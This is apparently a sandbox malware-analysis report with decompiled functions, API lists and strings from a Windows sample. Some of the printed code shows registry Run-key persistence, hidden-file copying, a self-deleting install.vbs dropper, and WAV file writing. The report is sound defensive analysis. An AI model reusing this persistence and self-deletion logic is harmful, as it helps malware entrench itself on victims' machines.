Part of subcall function 0075015B: TerminateProcess.KERNEL32(00000000,?,0074AD95), ref: 0075016B
Part of subcall function 0075015B: WaitForSingleObject.KERNEL32(000000FF,?,0074AD95), ref: 0075017E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0074AE8E
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0074AEA1
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0074AECF
SetFileAttributesW.KERNEL32(?,00000080), ref: 0074AEDD

Part of subcall function 00749D73: TerminateThread.KERNEL32(0074884B,00000000,?,0074ADA3), ref: 00749D82
Part of subcall function 00749D73: UnhookWindowsHookEx.USER32(00000000), ref: 00749D92
Part of subcall function 00749D73: TerminateThread.KERNEL32(Function_00008830,00000000,?,0074ADA3), ref: 00749DA4

ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074B0D4
ExitProcess.KERNEL32 ref: 0074B0DB

Strings

Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0074ADD2
fso.DeleteFolder ", xrefs: 0074B056
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0074AE21
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0074B088
exepath, xrefs: 0074AE6B
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0074AF60
Temp, xrefs: 0074AF26
"), xrefs: 0074AF89
while fso.FileExists(", xrefs: 0074AF9E
open, xrefs: 0074B0CE
fso.DeleteFile ", xrefs: 0074AFE4
.vbs, xrefs: 0074AEE6
wend, xrefs: 0074B02C
On Error Resume Next, xrefs: 0074AF6E

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 3659626935-2802769051
Opcode ID: 23cc23ff93a28e579b13016005fe02366f3bcaa9dc1fc2bf0c2167235a330f17
Instruction ID: 074a55d010557312c3cd0ca52db579b7c8c690ac6c165dbffb8c1772a05e074a
Opcode Fuzzy Hash: 23cc23ff93a28e579b13016005fe02366f3bcaa9dc1fc2bf0c2167235a330f17
Instruction Fuzzy Hash: 1181A571A10118ABCB19F7A0DC6ADFF777AAF91700F404129F806671A2EF2C5D8AC690

Uniqueness

Uniqueness Score: -1.00%

Function 00741A64, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00741A64(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x7aba9a & 0x0000ffff;
				_t83 = ( *0x7abaa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x7aba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x7aba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x7aba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x7abaa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

0x00741a73
0x00741a76
0x00741a7d
0x00741a80
0x00741a87
0x00741a9a
0x00741a9f
0x00741ab0
0x00741ab8
0x00741ac3
0x00741ac9
0x00741ad2
0x00741ad7
0x00741af3
0x00741b02
0x00741b12
0x00741b22
0x00741b31
0x00741b40
0x00741b50
0x00741b60
0x00741b6f
0x00741b7e
0x00741b8e
0x00741b9e
0x00741bad
0x00741bbb
0x00741bbe
0x00000000
0x00741bc4
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741ACC
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741AF3
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B02
WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B12
WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B22
WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B31
WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B40
WriteFile.KERNEL32(00000000,007ABA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B50
WriteFile.KERNEL32(00000000,007ABA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B60
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B6F
WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B7E
WriteFile.KERNEL32(00000000,007ABAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B8E
WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B9E
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741BAD

Strings

WAVE, xrefs: 00741B0C
RIFF, xrefs: 00741AED
data, xrefs: 00741B98
fmt , xrefs: 00741B1C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: b6b224c4a9847c6b8756e5e5cd1214a6661ab53e66020115fc4c0c88b039bbc3
Instruction ID: 1be4641a6e65af043514cfeff5e5ebb85f5d20be820419a2af10d2ad7aed0515
Opcode Fuzzy Hash: b6b224c4a9847c6b8756e5e5cd1214a6661ab53e66020115fc4c0c88b039bbc3
Instruction Fuzzy Hash: 69410CB5A40218BAE710DB91CD86FFFBABCEB45B50F404056F704EA0C1D7B85A05DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0074A987, Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0074A987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				WCHAR* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E0075805B( &_v92, __ecx, _t143);
					_t259 = 0x7ac500;
					E00741EFA(0x7ac500, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(E00741EEB(0x7ac530), 0);
					_t143 = _a4;
					_t139 = E007430A6(_t143,  &_v92, E00747514( &_v44, 0x7ac530, _t268, "\\"), 0x7ac530, _t268, _t143);
					_t259 = 0x7ac500;
					E00741EFA(0x7ac500, _t138, _t260, _t139);
					E00741EF0();
				}
				E00741EF0();
				_t152 = E00741EEB(_t259);
				_t67 = 0x7abb08;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW(0x7abb08, E00741EEB(_t259), _t153);
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E0074A896(0x7ac4e8, E00741EEB(0x7ac4e8));
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E007430A6(_t143,  &_v92, E0074427F(_t143,  &_v68, E0077987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
									E00741EF0();
									E0074427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
									E0074766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
									__eflags = _a12 - 1;
									_t144 = "\n";
									if(__eflags == 0) {
										_t100 = E0074427F("\n",  &_v212, 0x7abb08);
										E00743311(E007430A6(_t144,  &_v68, E007430A6(_t144,  &_v116, E00743030( &_v140, E007430A6(_t144,  &_v164, E0074427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
										E00741EF0();
										E00741EF0();
										E00741EF0();
										E00741EF0();
										E00741EF0();
										E00741EF0();
									}
									_t79 = E0074427F(_t144,  &_v116, L"\"\"\", 0");
									E00743311(E007430A6(_t144,  &_v212, E00743030( &_v188, E00744429(_t144,  &_v164, E0074427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E00741EF0();
									E0074766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
									_t91 = E00741EEB( &_v92);
									_t92 = E00742489();
									_t94 = E00757947(E00741EEB( &_v44), _t92 + _t92, _t91, 0);
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										E00741EF0();
										return E00741EF0();
									} else {
										_t99 = ShellExecuteW(0, L"open", E00741EEB( &_v92), 0x79f724, 0x79f724, 0);
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0);
									}
								}
								_t113 = E00741EEB(_t259);
								_t143 = SetFileAttributesW;
								SetFileAttributesW(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x7ac530;
									SetFileAttributesW(E00741EEB(0x7ac530), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								E00741EFA(_t259, 0x36, _t260, E0075805B( &_v68, 0x36));
							} else {
								E00741EFA(_t259, _t128, _t260, E007430A6(_t143,  &_v140, E007430A6(_t143,  &_v116, E0075805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
								E00741EF0();
								E00741EF0();
							}
							E00741EF0();
							_t123 = E00741EEB(_t259);
							_t143 = 0x7abb08;
							_t124 = CopyFileW(0x7abb08, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								E00749DC9(0x7abb08, _t259, 0x7abb08);
								return 0;
							}
						}
						E0074A896(0x7ac4e8, E00741EEB(0x7ac4e8));
						return 1;
					}
					_t12 = _t67 + 2; // 0x0
					_t254 =  *_t12;
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}

0x0074a987
0x0074a994
0x0074a998
0x0074a99a
0x0074a99d
0x0074a9a0
0x0074a9a0
0x0074a9a3
0x0074a9a6
0x0074a9ab
0x0074a9ab
0x0074a9b4
0x0074a9fe
0x0074aa01
0x0074aa07
0x0074aa0d
0x0074aa15
0x0074a9b6
0x0074a9bf
0x0074a9c5
0x0074a9de
0x0074a9e4
0x0074a9ec
0x0074a9f4
0x0074a9f9
0x0074aa1d
0x0074aa29
0x0074aa2b
0x0074aa30
0x0074aa30
0x0074aa36
0x00000000
0x00000000
0x0074aa3b
0x0074aa52
0x0074aa52
0x0074aa54
0x0074aa5f
0x0074aa61
0x0074aa8b
0x0074aa91
0x0074aa93
0x0074ab42
0x0074ab4e
0x0074ab53
0x0074ab58
0x0074ab59
0x0074ab92
0x0074abb0
0x0074abb9
0x0074abc6
0x0074abd3
0x0074abd8
0x0074abdc
0x0074abe1
0x0074abf9
0x0074ac46
0x0074ac4e
0x0074ac56
0x0074ac61
0x0074ac6c
0x0074ac77
0x0074ac82
0x0074ac82
0x0074ac90
0x0074acd2
0x0074acdd
0x0074ace8
0x0074acf3
0x0074acfb
0x0074ad03
0x0074ad10
0x0074ad1b
0x0074ad24
0x0074ad39
0x0074ad40
0x0074ad42
0x0074ad6d
0x0074ad70
0x00000000
0x0074ad44
0x0074ad5b
0x0074ad61
0x0074ad64
0x00000000
0x00000000
0x0074ad67
0x0074ad67
0x0074ad42
0x0074ab5f
0x0074ab64
0x0074ab6b
0x0074ab6d
0x0074ab70
0x0074ab70
0x0074ab72
0x0074ab72
0x0074ab75
0x0074ab78
0x0074ab78
0x0074ab7d
0x0074ab81
0x0074ab85
0x0074ab90
0x0074ab90
0x00000000
0x0074ab81
0x0074aa99
0x0074aa9d
0x00000000
0x00000000
0x0074aaa3
0x0074aaa5
0x0074aaa8
0x0074aaa8
0x0074aaab
0x0074aaae
0x0074aaae
0x0074aab4
0x0074aab4
0x0074aaba
0x0074aabe
0x0074ab0b
0x0074aac0
0x0074aae8
0x0074aaf3
0x0074aafb
0x0074aafb
0x0074ab13
0x0074ab1d
0x0074ab23
0x0074ab29
0x0074ab2f
0x0074ab31
0x00000000
0x0074ab33
0x0074ab36
0x00000000
0x0074ab3b
0x0074ab31
0x0074aa6f
0x00000000
0x0074aa76
0x0074aa3d
0x0074aa3d
0x0074aa45
0x00000000
0x00000000
0x0074aa47
0x0074aa4a
0x0074aa50
0x00000000
0x00000000
0x00000000
0x0074aa50
0x0074aa58
0x0074aa5a
0x0074aa5d
0x0074aa5d
0x00000000

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0074A9BF
CopyFileW.KERNEL32(007ABB08,00000000,00000000,00000000), ref: 0074AA8B
CopyFileW.KERNEL32(007ABB08,00000000,00000000,00000000), ref: 0074AB29

Part of subcall function 0075805B: GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 007581B2

SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0074AB6B
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0074AB90
ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074AD5B
ExitProcess.KERNEL32 ref: 0074AD67

Strings

Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0074ABCB
Temp, xrefs: 0074AB97
\install.vbs, xrefs: 0074AB92
""", 0, xrefs: 0074AC88
6, xrefs: 0074AA99
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0074AC97
open, xrefs: 0074AD55
fso.DeleteFile , xrefs: 0074AC00
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0074AD08
WScript.Sleep 1000, xrefs: 0074ABBE

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
API String ID: 4018752923-1662879639
Opcode ID: 2fb50810ee5dc7b4033e5524a698ca6851b4955926640bf861d52df39408eb67
Instruction ID: 0f1f32120cac7f3dcf4d8db4977b8d721fabf051f04d835e970f2a4bdcc89b7e
Opcode Fuzzy Hash: 2fb50810ee5dc7b4033e5524a698ca6851b4955926640bf861d52df39408eb67
Instruction Fuzzy Hash: 1DA1A975A00114E7CB28F7A4DC56EFE737AAF64301F904129F80AA7191EF3C6E86C665

Uniqueness

Uniqueness Score: -1.00%

Function 007876AD, Relevance: 27.4, APIs: 18, Instructions: 419
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E007876AD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E00774F60(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0077A504())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x7ab4d0; // 0x2d19f60
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x7ab4dc; // 0x2d19f60
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x7ab4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E00787D55(_t298);
												E007801F5(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E007801F5( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												_t19 = _t282 * 4; // 0x2d1f1c0
												 *(_t298 + _t282 * 4) =  *(_t298 + _t19 + 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E00787D55(_t298);
											E007801F5(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x7ab4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E0077F348(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E007801F5(_t300);
												goto L12;
											} else {
												_t131 = E00781916(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0077698A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00790FF7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0077A504())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x7ab4d4; // 0x0
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x7ab4d8; // 0x0
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x7ab4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E00787CE8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E00787D55(_t302);
																					E007801F5(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E007801F5( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E00787D55(_t302);
																				E007801F5(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x7ab4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E0077F348(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E007801F5(_t304);
																					goto L56;
																				} else {
																					_t148 = E007815D4(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0077698A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E0077F348(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0077F949(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E007801F5(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E0077F348(_t262, _t95, 1);
																										E007801F5(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E00781916( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0077698A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
